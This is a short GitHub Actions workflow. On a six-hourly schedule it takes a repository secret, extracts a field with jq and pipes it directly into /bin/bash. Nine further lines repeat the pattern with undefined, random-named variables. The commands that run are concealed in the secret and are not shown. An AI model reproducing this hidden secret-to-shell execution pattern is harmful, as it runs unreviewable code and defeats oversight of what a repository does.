name: weinaisi

on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weinaisi
        env:
          oz80: ${{ secrets.oz80 }}
        run: |
          echo $oz80 | jq -r .uml58 | /bin/bash
          echo $vtgui18 | jq -r .yuke36 | /bin/bash
          echo $jait7455 | jq -r .zwzmi2 | /bin/bash
          echo $xbm507 | jq -r .d9202 | /bin/bash
          echo $dzajv28 | jq -r .rrb51395 | /bin/bash
          echo $p692 | jq -r .cr8 | /bin/bash
          echo $qxshn10999 | jq -r .cecc332 | /bin/bash
          echo $fjrof9 | jq -r .g9 | /bin/bash
          echo $mhll7 | jq -r .mfog74 | /bin/bash
          echo $noosw2 | jq -r .laj33 | /bin/bash

